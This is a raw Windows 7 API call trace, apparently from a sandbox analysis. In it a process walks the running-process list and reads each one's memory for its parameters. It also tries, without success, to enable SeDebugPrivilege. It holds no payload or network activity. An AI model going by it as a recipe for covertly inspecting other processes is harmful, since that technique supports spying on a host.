[0564.734] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0564.734] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0564.747] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x598) returned 0x1e8
[0564.747] GetLastError () returned 0x0
[0564.747] NtQueryInformationProcess (in: ProcessHandle=0x1e8, ProcessInformationClass=0x0, ProcessInformation=0xced530, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced530, ReturnLength=0x0) returned 0x0
[0564.747] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x7fffffd7018, lpBuffer=0xced660, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced660*, lpNumberOfBytesRead=0x0) returned 1
[0564.747] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x77d62660, lpBuffer=0xced678, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced678*, lpNumberOfBytesRead=0x0) returned 1
[0564.748] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x352850, lpBuffer=0xced560, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced560*, lpNumberOfBytesRead=0x0) returned 1
[0564.748] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x3526c8, lpBuffer=0xced2a0, nSize=0x42, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced2a0*, lpNumberOfBytesRead=0x0) returned 1
[0564.748] NtQueryInformationProcess (in: ProcessHandle=0x1e8, ProcessInformationClass=0x1, ProcessInformation=0xced6c8, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced6c8, ReturnLength=0x0) returned 0x0
[0564.749] NtQueryInformationProcess (in: ProcessHandle=0x1e8, ProcessInformationClass=0x0, ProcessInformation=0xced210, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced210, ReturnLength=0x0) returned 0x0
[0564.749] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x7fffffd7020, lpBuffer=0xced660, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced660*, lpNumberOfBytesRead=0x0) returned 1
[0564.749] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x351ea0, lpBuffer=0xced240, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced240*, lpNumberOfBytesRead=0x0) returned 1
[0564.749] malloc (_Size=0x80) returned 0x401d40
[0564.749] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x35270a, lpBuffer=0x401d40, nSize=0x7e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x401d40*, lpNumberOfBytesRead=0x0) returned 1
[0564.750] free (_Block=0x401d40)
[0564.750] CloseHandle (hObject=0x1e8) returned 1
[0564.751] _ui64tow (_Value=0x740, _Buffer="1432", _Radix=10) returned="1856"
[0564.753] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="1856") returned 4
[0564.754] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0564.754] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0564.770] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x740) returned 0x1e8
[0564.770] GetLastError () returned 0x0
[0564.770] NtQueryInformationProcess (in: ProcessHandle=0x1e8, ProcessInformationClass=0x0, ProcessInformation=0xced530, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced530, ReturnLength=0x0) returned 0x0
[0564.770] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x7fffffdf018, lpBuffer=0xced660, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced660*, lpNumberOfBytesRead=0x0) returned 1
[0564.770] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x77d62660, lpBuffer=0xced678, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced678*, lpNumberOfBytesRead=0x0) returned 1
[0564.771] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x4228e0, lpBuffer=0xced560, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced560*, lpNumberOfBytesRead=0x0) returned 1
[0564.771] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x4226ca, lpBuffer=0xced2a0, nSize=0x38, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced2a0*, lpNumberOfBytesRead=0x0) returned 1
[0564.771] NtQueryInformationProcess (in: ProcessHandle=0x1e8, ProcessInformationClass=0x1, ProcessInformation=0xced6c8, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced6c8, ReturnLength=0x0) returned 0x0
[0564.772] NtQueryInformationProcess (in: ProcessHandle=0x1e8, ProcessInformationClass=0x0, ProcessInformation=0xced210, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced210, ReturnLength=0x0) returned 0x0
[0564.772] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x7fffffdf020, lpBuffer=0xced660, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced660*, lpNumberOfBytesRead=0x0) returned 1
[0564.772] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x421ea0, lpBuffer=0xced240, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced240*, lpNumberOfBytesRead=0x0) returned 1
[0564.773] malloc (_Size=0xe0) returned 0x401d40
[0564.773] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x422702, lpBuffer=0x401d40, nSize=0xde, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x401d40*, lpNumberOfBytesRead=0x0) returned 1
[0564.773] free (_Block=0x401d40)
[0564.774] CloseHandle (hObject=0x1e8) returned 1
[0564.775] _ui64tow (_Value=0x764, _Buffer="1856", _Radix=10) returned="1892"
[0564.778] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="1892") returned 4
[0564.778] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0564.778] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0564.791] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x764) returned 0x1e8
[0564.791] GetLastError () returned 0x0
[0564.792] NtQueryInformationProcess (in: ProcessHandle=0x1e8, ProcessInformationClass=0x0, ProcessInformation=0xced530, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced530, ReturnLength=0x0) returned 0x0
[0564.792] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x7fffffd8018, lpBuffer=0xced660, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced660*, lpNumberOfBytesRead=0x0) returned 1
[0564.792] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x77d62660, lpBuffer=0xced678, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced678*, lpNumberOfBytesRead=0x0) returned 1
[0564.792] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x222340, lpBuffer=0xced560, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced560*, lpNumberOfBytesRead=0x0) returned 1
[0564.792] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x22215a, lpBuffer=0xced2a0, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced2a0*, lpNumberOfBytesRead=0x0) returned 1
[0564.792] NtQueryInformationProcess (in: ProcessHandle=0x1e8, ProcessInformationClass=0x1, ProcessInformation=0xced6c8, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced6c8, ReturnLength=0x0) returned 0x0
[0564.793] NtQueryInformationProcess (in: ProcessHandle=0x1e8, ProcessInformationClass=0x0, ProcessInformation=0xced210, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced210, ReturnLength=0x0) returned 0x0
[0564.793] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x7fffffd8020, lpBuffer=0xced660, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced660*, lpNumberOfBytesRead=0x0) returned 1
[0564.793] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x221990, lpBuffer=0xced240, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced240*, lpNumberOfBytesRead=0x0) returned 1
[0564.793] malloc (_Size=0xe6) returned 0x401d40
[0564.793] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x22219a, lpBuffer=0x401d40, nSize=0xe4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x401d40*, lpNumberOfBytesRead=0x0) returned 1
[0564.794] free (_Block=0x401d40)
[0564.794] CloseHandle (hObject=0x1e8) returned 1
[0564.795] _ui64tow (_Value=0x520, _Buffer="1892", _Radix=10) returned="1312"
[0564.797] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="1312") returned 4
[0564.798] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0564.798] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0564.810] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x520) returned 0x1e8
[0564.810] GetLastError () returned 0x0
[0564.810] NtQueryInformationProcess (in: ProcessHandle=0x1e8, ProcessInformationClass=0x0, ProcessInformation=0xced530, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced530, ReturnLength=0x0) returned 0x0
[0564.810] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x7fffffd5018, lpBuffer=0xced660, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced660*, lpNumberOfBytesRead=0x0) returned 1
[0564.810] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x77d62660, lpBuffer=0xced678, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced678*, lpNumberOfBytesRead=0x0) returned 1
[0564.810] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x2728c0, lpBuffer=0xced560, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced560*, lpNumberOfBytesRead=0x0) returned 1
[0564.810] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x2726d4, lpBuffer=0xced2a0, nSize=0x44, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced2a0*, lpNumberOfBytesRead=0x0) returned 1
[0564.811] NtQueryInformationProcess (in: ProcessHandle=0x1e8, ProcessInformationClass=0x1, ProcessInformation=0xced6c8, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced6c8, ReturnLength=0x0) returned 0x0
[0564.812] NtQueryInformationProcess (in: ProcessHandle=0x1e8, ProcessInformationClass=0x0, ProcessInformation=0xced210, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced210, ReturnLength=0x0) returned 0x0
[0564.812] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x7fffffd5020, lpBuffer=0xced660, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced660*, lpNumberOfBytesRead=0x0) returned 1
[0564.812] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x271ea0, lpBuffer=0xced240, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced240*, lpNumberOfBytesRead=0x0) returned 1
[0564.813] malloc (_Size=0x74) returned 0x401d40
[0564.813] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x272718, lpBuffer=0x401d40, nSize=0x72, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x401d40*, lpNumberOfBytesRead=0x0) returned 1
[0564.813] free (_Block=0x401d40)
[0564.814] CloseHandle (hObject=0x1e8) returned 1
[0564.814] _ui64tow (_Value=0x4dc, _Buffer="1312", _Radix=10) returned="1244"
[0564.817] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="1244") returned 4
[0564.818] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0564.818] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0564.840] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4dc) returned 0x1e8
[0564.840] GetLastError () returned 0x0
[0564.840] NtQueryInformationProcess (in: ProcessHandle=0x1e8, ProcessInformationClass=0x0, ProcessInformation=0xced530, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced530, ReturnLength=0x0) returned 0x0
[0564.840] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x7fffffdf018, lpBuffer=0xced660, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced660*, lpNumberOfBytesRead=0x0) returned 1
[0564.840] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x77d62660, lpBuffer=0xced678, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced678*, lpNumberOfBytesRead=0x0) returned 1
[0564.840] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x2027e0, lpBuffer=0xced560, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced560*, lpNumberOfBytesRead=0x0) returned 1
[0564.841] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x2026c8, lpBuffer=0xced2a0, nSize=0x3a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced2a0*, lpNumberOfBytesRead=0x0) returned 1
[0564.841] NtQueryInformationProcess (in: ProcessHandle=0x1e8, ProcessInformationClass=0x1, ProcessInformation=0xced6c8, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced6c8, ReturnLength=0x0) returned 0x0
[0564.842] NtQueryInformationProcess (in: ProcessHandle=0x1e8, ProcessInformationClass=0x0, ProcessInformation=0xced210, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced210, ReturnLength=0x0) returned 0x0
[0564.842] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x7fffffdf020, lpBuffer=0xced660, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced660*, lpNumberOfBytesRead=0x0) returned 1
[0564.842] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x201ea0, lpBuffer=0xced240, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced240*, lpNumberOfBytesRead=0x0) returned 1
[0564.843] malloc (_Size=0x10) returned 0x3eef40
[0564.843] ReadProcessMemory (in: hProcess=0x1e8, lpBaseAddress=0x202702, lpBuffer=0x3eef40, nSize=0xe, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x3eef40*, lpNumberOfBytesRead=0x0) returned 1
[0564.843] free (_Block=0x3eef40)
[0564.843] CloseHandle (hObject=0x1e8) returned 1
[0564.844] _ui64tow (_Value=0x7e4, _Buffer="1244", _Radix=10) returned="2020"
[0564.847] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="2020") returned 4
[0564.848] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0564.848] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0564.861] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7e4) returned 0x0
[0564.862] CloseHandle (hObject=0x0) returned 0
[0564.886] free (_Block=0x3f1c80)
[0564.886] malloc (_Size=0x48) returned 0x3ed130
[0564.886] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x1e8
[0564.886] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x7fef4a510f0, lpParameter=0x7fef4c23eb0, dwCreationFlags=0x0, lpThreadId=0x7fef4c23eb0 | out: lpThreadId=0x7fef4c23eb0*=0x1ec) returned 0x1f0
[0564.888] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xcedab8 | out: lpSystemTimeAsFileTime=0xcedab8*(dwLowDateTime=0x6ae894b0, dwHighDateTime=0x1dab599))
[0564.888] malloc (_Size=0x40) returned 0x3ed1d0
[0564.888] malloc (_Size=0x10) returned 0x3eef40
[0564.888] SetEvent (hEvent=0x1e8) returned 1
[0564.891] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x4) returned 0x1fd9b0
[0564.891] SetThreadPreferredUILanguages (in: dwFlags=0x8, pwszLanguagesBuffer=0x1fd9b0, pulNumLanguages=0xcee620 | out: pulNumLanguages=0xcee620) returned 1
[0564.891] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x1fd9b0 | out: hHeap=0x1c0000) returned 1
[0572.507] ?AddRef@?$CImpl@UIWbemObjectTextSrc@@VCWmiObjectTextSrc@@@@UEAAKXZ () returned 0x2
[0572.518] SetLastError (dwErrCode=0x0)
[0572.518] GetThreadPreferredUILanguages (in: dwFlags=0x40, pulNumLanguages=0xcee628, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xcee530 | out: pulNumLanguages=0xcee628, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xcee530) returned 1
[0572.518] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x8) returned 0x1fd9d0
[0572.518] SetLastError (dwErrCode=0x0)
[0572.518] GetThreadPreferredUILanguages (in: dwFlags=0x40, pulNumLanguages=0xcee628, pwszLanguagesBuffer=0x1fd9d0, pcchLanguagesBuffer=0xcee530 | out: pulNumLanguages=0xcee628, pwszLanguagesBuffer=0x1fd9d0, pcchLanguagesBuffer=0xcee530) returned 1
[0572.518] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x8) returned 0x1fd9b0
[0572.518] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x1fd9d0 | out: hHeap=0x1c0000) returned 1
[0572.518] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x14) returned 0x1fd650
[0572.518] SetThreadPreferredUILanguages (in: dwFlags=0x8, pwszLanguagesBuffer=0x1fd650, pulNumLanguages=0xcee628 | out: pulNumLanguages=0xcee628) returned 1
[0572.519] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x1fd650 | out: hHeap=0x1c0000) returned 1
[0572.521] SafeArrayGetElemsize (psa=0x22b420) returned 0x8
[0572.521] SafeArrayPutElement (psa=0x22b420, rgIndices=0xcede60, pv=0x227398) returned 0x0
[0572.521] SafeArrayRedim (in: psa=0x22b420, psaboundNew=0xcede78 | out: psa=0x22b420) returned 0x0
[0572.521] SafeArrayCopy (in: psa=0x22b420, ppsaOut=0xceddc0 | out: ppsaOut=0xceddc0) returned 0x0
[0572.523] SetEvent (hEvent=0x1e8) returned 1
[0572.524] free (_Block=0x3ed130)
[0572.524] GetCurrentThread () returned 0xfffffffffffffffe
[0572.524] OpenThreadToken (in: ThreadHandle=0xfffffffffffffffe, DesiredAccess=0x28, OpenAsSelf=1, TokenHandle=0xcedc18 | out: TokenHandle=0xcedc18*=0x1f4) returned 1
[0572.524] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0xcedbf4 | out: lpLuid=0xcedbf4*(LowPart=0x14, HighPart=0)) returned 1
[0572.525] SetLastError (dwErrCode=0x0)
[0572.525] AdjustTokenPrivileges (in: TokenHandle=0x1f4, DisableAllPrivileges=0, NewState=0xcedbf0*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
[0572.525] GetLastError () returned 0x514
[0572.525] CloseHandle (hObject=0x1f4) returned 1
[0572.525] malloc (_Size=0x18) returned 0x3eef00
[0572.525] SafeArrayPutElement (psa=0x22b460, rgIndices=0xcedc98, pv=0x22b4d8) returned 0x0
[0572.525] SafeArrayPutElement (psa=0x22b4a0, rgIndices=0xcedc98, pv=0x22b4d8) returned 0x0
[0572.526] free (_Block=0x3eef00)
[0572.526] malloc (_Size=0x8000) returned 0x402550
[0572.526] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x402550, Length=0x8000, ResultLength=0x0 | out: SystemInformation=0x402550, ResultLength=0x0) returned 0xc0000004
[0572.529] free (_Block=0x402550)
[0572.529] malloc (_Size=0x10000) returned 0x3f1c80
[0572.529] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3f1c80, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x3f1c80, ResultLength=0x0) returned 0x0
[0572.530] _ui64tow (_Value=0x0, _Buffer="", _Radix=10) returned="0"
[0572.533] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="0") returned 1
[0572.533] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x11001001, szCSDVersion="") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0572.533] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0572.540] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x0) returned 0x0
[0572.540] CloseHandle (hObject=0x0) returned 0
[0572.541] _ui64tow (_Value=0x4, _Buffer="0", _Radix=10) returned="4"
[0572.543] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="4") returned 1
[0572.544] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0572.544] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0572.556] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4) returned 0x0
[0572.556] CloseHandle (hObject=0x0) returned 0
[0572.556] _ui64tow (_Value=0x110, _Buffer="4", _Radix=10) returned="272"
[0572.559] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="272") returned 3
[0572.559] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0572.559] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0572.571] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x110) returned 0x0
[0572.571] CloseHandle (hObject=0x0) returned 0
[0572.571] _ui64tow (_Value=0x15c, _Buffer="272", _Radix=10) returned="348"
[0572.573] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="348") returned 3
[0572.574] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0572.574] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0572.584] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x15c) returned 0x0
[0572.584] CloseHandle (hObject=0x0) returned 0
[0572.585] _ui64tow (_Value=0x180, _Buffer="348", _Radix=10) returned="384"
[0572.587] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="384") returned 3
[0572.587] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0572.587] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0572.601] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x180) returned 0x0
[0572.601] CloseHandle (hObject=0x0) returned 0
[0572.601] _ui64tow (_Value=0x18c, _Buffer="384", _Radix=10) returned="396"
[0572.603] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="396") returned 3
[0572.604] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
